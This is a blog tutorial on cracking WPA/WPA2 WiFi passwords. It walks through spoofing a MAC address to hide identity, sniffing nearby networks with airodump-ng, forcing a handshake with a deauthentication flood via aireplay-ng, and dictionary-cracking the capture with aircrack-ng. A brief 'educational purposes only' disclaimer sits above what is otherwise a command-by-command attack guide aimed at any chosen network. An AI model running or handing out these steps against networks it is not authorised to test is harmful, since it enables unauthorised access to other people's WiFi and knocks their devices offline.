I regularly get asked how hackers break into peoples WiFi and if it is easy. This blog will explain exactly how to hack WiFi and just how easy it is.
WPA & WPA2 are alot more secure than WEP however with persistence and a powerful computer anything is possible.
*** This tutorial is for educational purposes only and not to be used for illegal purposes!
There are a few different ways of crack wi-fi passwords but this method works best for me but might not for everyone so if you have any tips/ improvements please feel free to comment them below.
What you will need:
- Windows or preferably Backtrack or another Linux distribution
- Aircrack-ng A target wi-fi (preferably your own) I find wi-fi’s with custom names easier to crack because they tend to have custom passwords.
- A password list
- A few hours to spare
I will be doing this from Ubuntu as I personally find it easier to crack/hack on Linux.
The first thing to do is to change your MAC address this is otherwise known as MAC spoofing and is used to protect your identity and to insure your security (of course this isn’t a problem if your only using this for educational purposes).
Open a new terminal (ctrl + alt + t) then type:
- Disable interface: sudo ifconfig <interface> down
- Change the MAC address by typing: sudo ifconfig <interface> hw addr 00:11:22:33:44:55
- Enable interface: sudo ifconfig <interface> up
That’s it, easy as 1,2,3.
Note: Replace <interface> with the appropriate name of your interface e.g. wlan0 or eth0.
Now lets begin the fun part!!!
To start cracking the wifi password insure you have Aircrack-ng installed, if you don’t then simply open a new terminal and type: sudo apt-get install aircrack-ng. You will also need a wordlist, a basic one can be found here, the list is called darkc0de.lst. Make sure the file is saved in your root/home directory.
Once installed close the terminal and open a new one and begin cracking.
- First you need to put the adapter in monitor mode to do this type: airmon-ng start wlan0
- Second you need to start sniffing for networks to do this type: airodump-ng mon0. Pick a BSSID that has WPA or WPA2 and PSK.
- Once you have chosen your BSSID you need to get your interface to monitor on the same channel as your selected BSSID to do this run the following two commands: airmon-ng stop mon0 now you will need to start monitoring the channel the BSSID is on so type: airmon-ng start wlan0 <channel>
- Now you need to focus on your selected BSSID, we do this by typing: airodump-ng –bssid <the selected bssid> -c <the channel of the bssid> -w wpalist <your interface>
Now we need to capture a WPA handshake to do this we will send de-authorization requests to the BSSID. To do this we need to open a new terminal and type: aireplay-ng –deauth 100 -a <bssid> mon0.
Now we have everything we need to go back to cracking the password.
5. Go back to your original terminal and type: aircrack-ng -w <location of your wordlist> -b <bssid> wpalist-01.cap.
Note: If you have no luck with wpadeauth*.cap then try wpalist.cap.